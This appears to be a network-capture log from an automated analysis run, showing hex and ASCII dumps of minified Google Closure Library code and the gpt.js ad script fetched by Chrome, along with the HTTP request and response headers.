                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC644INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 2f 2a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 20 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 20 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 35 2d 32 30 31 38 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 2e 2c 20 4e 65 74 66 6c 69 78 2c 20 49 6e 63 2e 2c 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 2e 20 61 6e 64 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: (function(_){/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ /* Copyright Google LLC SPDX-License-Identifier: Apache-2.0 */ /* Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1390INData Raw: 41 4e 54 49 45 53 20 4f 52 20 43 4f 4e 44 49 54 49 4f 4e 53 20 4f 46 20 41 4e 59 20 4b 49 4e 44 2c 20 65 69 74 68 65 72 20 65 78 70 72 65 73 73 20 6f 72 20 69 6d 70 6c 69 65 64 2e 20 0a 20 53 65 65 20 74 68 65 20 4c 69 63 65 6e 73 65 20 66 6f 72 20 74 68 65 20 73 70 65 63 69 66 69 63 20 6c 61 6e 67 75 61 67 65 20 67 6f 76 65 72 6e 69 6e 67 20 70 65 72 6d 69 73 73 69 6f 6e 73 20 61 6e 64 20 0a 20 6c 69 6d 69 74 61 74 69 6f 6e 73 20 75 6e 64 65 72 20 74 68 65 20 4c 69 63 65 6e 73 65 2e 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 4d 61 74 68 2e 75 75 69 64 2e 6a 73 20 28 76 31 2e 34 29 20 0a 68 74 74 70 3a 2f 2f 77 77 77 2e 62 72 6f 6f 66 61 2e 63 6f 6d 20 0a 6d 61 69 6c 74 6f 3a 72 6f 62 65 72 74 40 62 72 6f 6f 66 61 2e 63 6f 6d 20 0a 43 6f 70 79 72 69 67 68 74 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ /* Math.uuid.js (v1.4) http://www.broofa.com mailto:robert@broofa.com Copyright
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1390INData Raw: 6f 2c 74 6f 2c 77 6f 2c 79 6f 2c 7a 6f 2c 41 6f 2c 42 6f 2c 44 6f 2c 46 6f 2c 47 6f 2c 49 6f 2c 4a 6f 2c 4b 6f 2c 4c 6f 2c 4d 6f 2c 4f 6f 2c 54 6f 2c 56 6f 2c 64 70 2c 66 70 2c 68 70 2c 6b 70 2c 6a 70 2c 69 70 2c 77 70 2c 7a 70 2c 48 70 2c 49 70 2c 4b 70 2c 4c 70 2c 4d 70 2c 4f 70 2c 50 70 2c 52 70 2c 53 70 2c 54 70 2c 56 70 2c 57 70 2c 59 70 2c 58 70 2c 24 70 2c 63 71 2c 62 71 2c 64 71 2c 66 71 2c 67 71 2c 6a 71 2c 6b 71 2c 6c 71 2c 6f 71 2c 72 71 2c 71 71 2c 74 71 2c 75 71 2c 76 71 2c 42 71 2c 43 71 2c 45 71 2c 47 71 2c 48 71 2c 4a 71 2c 49 71 2c 4d 71 2c 50 71 2c 52 71 2c 55 71 2c 57 71 2c 62 72 2c 65 72 2c 66 72 2c 6e 72 2c 72 72 2c 75 72 2c 73 72 2c 74 72 2c 79 72 2c 7a 72 2c 42 72 2c 43 72 2c 44 72 2c 45 72 2c 48 72 2c 49 72 2c 4a 72 2c 4b 72 2c 4c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: o,to,wo,yo,zo,Ao,Bo,Do,Fo,Go,Io,Jo,Ko,Lo,Mo,Oo,To,Vo,dp,fp,hp,kp,jp,ip,wp,zp,Hp,Ip,Kp,Lp,Mp,Op,Pp,Rp,Sp,Tp,Vp,Wp,Yp,Xp,$p,cq,bq,dq,fq,gq,jq,kq,lq,oq,rq,qq,tq,uq,vq,Bq,Cq,Eq,Gq,Hq,Jq,Iq,Mq,Pq,Rq,Uq,Wq,br,er,fr,nr,rr,ur,sr,tr,yr,zr,Br,Cr,Dr,Er,Hr,Ir,Jr,Kr,L
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1390INData Raw: 28 22 43 68 72 6f 6d 65 22 29 7c 7c 5f 2e 6a 61 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 5f 2e 6d 61 28 29 3f 30 3a 5f 2e 6a 61 28 22 45 64 67 65 22 29 29 7c 7c 5f 2e 6a 61 28 22 53 69 6c 6b 22 29 7d 3b 5f 2e 73 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 6a 61 28 22 41 6e 64 72 6f 69 64 22 29 26 26 21 28 5f 2e 71 61 28 29 7c 7c 5f 2e 70 61 28 29 7c 7c 5f 2e 6e 61 28 29 7c 7c 5f 2e 6a 61 28 22 53 69 6c 6b 22 29 29 7d 3b 76 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 75 61 3d 3d 3d 76 6f 69 64 20 30 26 26 28 75 61 3d 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 75 61 7d 3b 78 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 76 61 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 77 61 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ("Chrome")||_.ja("CriOS"))&&!(_.ma()?0:_.ja("Edge"))||_.ja("Silk")};_.sa=function(){return _.ja("Android")&&!(_.qa()||_.pa()||_.na()||_.ja("Silk"))};va=function(){ua===void 0&&(ua=null);return ua};xa=function(a){var b=va();return new _.wa(b?b.createScript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1390INData Raw: 6f 6e 63 65 22 2c 62 29 7d 3b 54 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 73 72 63 3d 5f 2e 79 61 28 62 29 3b 53 61 28 61 29 7d 3b 5f 2e 56 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 55 61 29 72 65 74 75 72 6e 20 61 2e 67 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 22 29 3b 7d 3b 58 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 5f 2e 57 61 28 61 2c 62 29 3b 76 61 72 20 63 3b 28 63 3d 62 3e 3d 30 29 26 26 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 70 6c 69 63 65 2e 63 61 6c 6c 28 61 2c 62 2c 31 29 3b 72 65 74 75 72 6e 20 63 7d 3b 5f 2e 59 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 3e 30 29 7b 66 6f 72 28 76 61 72 20 63 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: once",b)};Ta=function(a,b){a.src=_.ya(b);Sa(a)};_.Va=function(a){if(a instanceof _.Ua)return a.g;throw Error("");};Xa=function(a,b){b=_.Wa(a,b);var c;(c=b>=0)&&Array.prototype.splice.call(a,b,1);return c};_.Ya=function(a){var b=a.length;if(b>0){for(var c=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1390INData Raw: 62 2e 70 75 73 68 28 64 29 7d 72 65 74 75 72 6e 20 62 7d 3b 6f 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 62 2e 73 74 61 63 6b 3d 45 72 72 6f 72 28 29 2e 73 74 61 63 6b 7d 29 3b 61 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 45 72 72 6f 72 2e 70 72 6f 74 6f 74 79 70 65 29 3b 61 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 61 7d 3b 70 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 7b 7d 3b 62 2e 77 69 6e 6e 65 72 5f 71 69 64 3d 61 2e 67 65 74 45 73 63 61 70 65 64 51 65 6d 51 75 65 72 79 49 64 28 29 3b 62 2e 63 69 64 3d 5f 2e 74 28 61 2c 31 39 29 3b 62 2e 65 63 72 73 3d 5f 2e 74 28 61 2c 31 31 29 3b 72 65 74 75 72 6e 22 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: b.push(d)}return b};ob=function(a){a=a(function(b){b.stack=Error().stack});a.prototype=Object.create(Error.prototype);a.prototype.constructor=a};pb=function(a){var b={};b.winner_qid=a.getEscapedQemQueryId();b.cid=_.t(a,19);b.ecrs=_.t(a,11);return"https://
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1390INData Raw: 43 6f 64 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 2e 73 75 62 61 72 72 61 79 28 63 2c 63 2b 3d 31 30 32 34 30 29 29 3b 62 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 63 3f 61 2e 73 75 62 61 72 72 61 79 28 63 29 3a 61 29 3b 72 65 74 75 72 6e 20 62 74 6f 61 28 62 29 7d 3b 41 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 7a 62 5b 61 5d 7c 7c 22 22 7d 3b 43 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 42 62 26 26 61 21 3d 6e 75 6c 6c 26 26 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 7d 3b 45 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 21 3d 3d 44 62 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 69 6c 6c 65 67 61 6c 20 65 78 74 65 72 6e 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Code.apply(null,a.subarray(c,c+=10240));b+=String.fromCharCode.apply(null,c?a.subarray(c):a);return btoa(b)};Ab=function(a){return zb[a]||""};Cb=function(a){return Bb&&a!=null&&a instanceof Uint8Array};Eb=function(a){if(a!==Db)throw Error("illegal externa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1390INData Raw: 3b 5f 2e 67 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 26 32 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 7d 3b 69 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 5f 2e 68 63 3b 69 66 28 21 61 29 74 68 72 6f 77 20 45 72 72 6f 72 28 28 74 79 70 65 6f 66 20 62 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 62 28 29 3a 62 29 7c 7c 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 6b 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 55 71 3d 21 30 3b 72 65 74 75 72 6e 20 61 7d 3b 6c 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 63 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 30 7d 29 7d 3b 6e 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 6d 63 3b 72 65 74 75 72 6e 20 6b 63 28 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ;_.gc=function(a){if(a&2)throw Error();};ic=function(a){var b=_.hc;if(!a)throw Error((typeof b==="function"?b():b)||String(a));};kc=function(a){a.Uq=!0;return a};lc=function(){return kc(function(a){return a===0})};nc=function(){var a=mc;return kc(function
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1390INData Raw: 36 3e 3e 3e 30 7d 3b 4b 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 3c 30 29 7b 49 63 28 2d 61 29 3b 76 61 72 20 62 3d 5f 2e 79 28 4a 63 28 47 63 2c 48 63 29 29 3b 61 3d 62 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 62 3d 62 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 47 63 3d 61 3e 3e 3e 30 3b 48 63 3d 62 3e 3e 3e 30 7d 65 6c 73 65 20 49 63 28 61 29 7d 3b 4d 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3e 3e 3e 3d 30 3b 61 3e 3e 3e 3d 30 3b 69 66 28 62 3c 3d 32 30 39 37 31 35 31 29 76 61 72 20 63 3d 22 22 2b 28 34 32 39 34 39 36 37 32 39 36 2a 62 2b 61 29 3b 65 6c 73 65 20 4d 62 28 29 3f 63 3d 22 22 2b 28 42 69 67 49 6e 74 28 62 29 3c 3c 42 69 67 49 6e 74 28 33 32 29 7c 42 69 67 49 6e 74 28 61 29 29 3a 28 63 3d 28 61 3e 3e 3e 32 34 7c 62 3c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 6>>>0};Kc=function(a){if(a<0){Ic(-a);var b=_.y(Jc(Gc,Hc));a=b.next().value;b=b.next().value;Gc=a>>>0;Hc=b>>>0}else Ic(a)};Mc=function(a,b){b>>>=0;a>>>=0;if(b<=2097151)var c=""+(4294967296*b+a);else Mb()?c=""+(BigInt(b)<<BigInt(32)|BigInt(a)):(c=(a>>>24|b<
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1390INData Raw: 28 61 29 7d 3b 53 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 3d 22 62 6f 6f 6c 65 61 6e 22 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 45 78 70 65 63 74 65 64 20 62 6f 6f 6c 65 61 6e 20 62 75 74 20 67 6f 74 20 22 2b 52 63 28 61 29 2b 22 3a 20 22 2b 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 54 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 74 79 70 65 6f 66 20 61 3d 3d 3d 22 62 6f 6f 6c 65 61 6e 22 29 72 65 74 75 72 6e 20 61 3b 69 66 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 21 21 61 7d 3b 56 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 79 70 65 6f 66 20 61 3b 73 77 69 74 63 68 28 62 29 7b 63 61 73 65 20 22 62 69 67 69 6e 74 22 3a 72 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: (a)};Sc=function(a){if(typeof a!=="boolean")throw Error("Expected boolean but got "+Rc(a)+": "+a);return a};Tc=function(a){if(a==null||typeof a==="boolean")return a;if(typeof a==="number")return!!a};Vc=function(a){var b=typeof a;switch(b){case "bigint":re


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    114192.168.2.449874216.58.206.664434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC464OUTGET /tag/js/gpt.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: securepubads.g.doubleclick.net
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC787INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:21:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expires: Mon, 30 Sep 2024 17:21:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: private, max-age=900, stale-while-revalidate=3600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: 626 / 19996 / m202409240101 / config-hash: 15818932235782585000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cafe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 107264
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC603INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 73 74 74 63 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 69 66 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 74 61 67 26 26 67 6f 6f 67 6c 65 74 61 67 2e 65 76 61 6c 53 63 72 69 70 74 73 29 7b 67 6f 6f 67 6c 65 74 61 67 2e 65 76 61 6c 53 63 72 69 70 74 73 28 29 3b 7d 69 66 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 74 61 67 26 26 67 6f 6f 67 6c 65 74 61 67 2e 5f 6c 6f 61 64 65 64 5f 29 72 65 74 75 72 6e 3b 76 61 72 20 6e 2c 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 2c 62 61 3d 74 79 70 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: (function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=type
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1390INData Raw: 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 67 6c 6f 62 61 6c 20 6f 62 6a 65 63 74 22 29 3b 7d 2c 64 61 3d 63 61 28 74 68 69 73 29 2c 65 61 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 28 22 78 22 29 3d 3d 3d 22 73 79 6d 62 6f 6c 22 2c 74 3d 7b 7d 2c 66 61 3d 7b 7d 2c 76 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 63 7c 7c 61 21 3d 6e 75 6c 6c 29 7b 63 3d 66 61 5b 62 5d 3b 69 66 28 63 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 5b 62 5d 3b 63 3d 61 5b 63 5d 3b 72 65 74 75 72 6e 20 63 21 3d 3d 76 6f 69 64 20 30 3f 63 3a 61 5b 62 5d 7d 7d 2c 77 3d 66 75 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: &&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},fa={},v=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1390INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 61 28 61 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 2c 22 65 73 36 22 29 3b 76 61 72 20 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 7b 6e 65 78 74 3a 61 7d 3b 61 5b 76 28 74 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 72 65 74 75 72 6e 20 61 7d 2c 6a 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 69 61 28 61 2c 61 29 7d 2c 69 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 72 61 77 3d 62 3b 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 26 26 28 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 61 29 2c 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 62 29 29 3b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: :function(){return ha(aa(this))}})}return a},"es6");var ha=function(a){a={next:a};a[v(t.Symbol,"iterator")]=function(){return this};return a},ja=function(a){return ia(a,a)},ia=function(a,b){a.raw=b;Object.freeze&&(Object.freeze(a),Object.freeze(b));return
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1390INData Raw: 20 66 6f 72 28 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 63 21 3d 22 70 72 6f 74 6f 74 79 70 65 22 29 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 29 7b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 62 2c 63 29 3b 64 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 63 2c 64 29 7d 65 6c 73 65 20 61 5b 63 5d 3d 62 5b 63 5d 3b 61 2e 7a 62 3d 62 2e 70 72 6f 74 6f 74 79 70 65 7d 2c 75 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 4e 75 6d 62 65 72 28 74 68 69 73 29 2c 62 3d 5b 5d 2c 63 3d 61 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 62 5b 63 2d 61 5d 3d 61 72 67 75 6d 65 6e 74 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: for(var c in b)if(c!="prototype")if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.zb=b.prototype},ua=function(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=arguments
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1390INData Raw: 73 2e 67 29 3f 64 65 6c 65 74 65 20 67 5b 64 5d 5b 74 68 69 73 2e 67 5d 3a 21 31 7d 3b 72 65 74 75 72 6e 20 66 7d 2c 22 65 73 36 22 29 3b 77 28 22 4d 61 70 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 76 28 61 2e 70 72 6f 74 6f 74 79 70 65 2c 22 65 6e 74 72 69 65 73 22 29 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 68 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 6b 3d 6e 65 77 20 61 28 78 28 5b 5b 68 2c 22 73 22 5d 5d 29 29 3b 69 66 28 6b 2e 67 65 74 28 68 29 21 3d 22 73 22 7c 7c 6b 2e 73 69 7a 65 21 3d 31 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: s.g)?delete g[d][this.g]:!1};return f},"es6");w("Map",function(a){if(function(){if(!a||typeof a!="function"||!v(a.prototype,"entries")||typeof Object.seal!="function")return!1;try{var h=Object.seal({x:4}),k=new a(x([[h,"s"]]));if(k.get(h)!="s"||k.size!=1|
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1390INData Raw: 65 74 75 72 6e 20 65 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 2e 6b 65 79 7d 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 2e 76 61 6c 75 65 7d 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 6b 29 7b 66 6f 72 28 76 61 72 20 6c 3d 76 28 74 68 69 73 2c 22 65 6e 74 72 69 65 73 22 29 2e 63 61 6c 6c 28 74 68 69 73 29 2c 71 3b 21 28 71 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 71 3d 71 2e 76 61 6c 75 65 2c 68 2e 63 61 6c 6c 28 6b 2c 71 5b 31 5d 2c 71 5b 30 5d 2c 74 68 69 73 29 7d 3b 63 2e 70 72 6f 74 6f 74 79
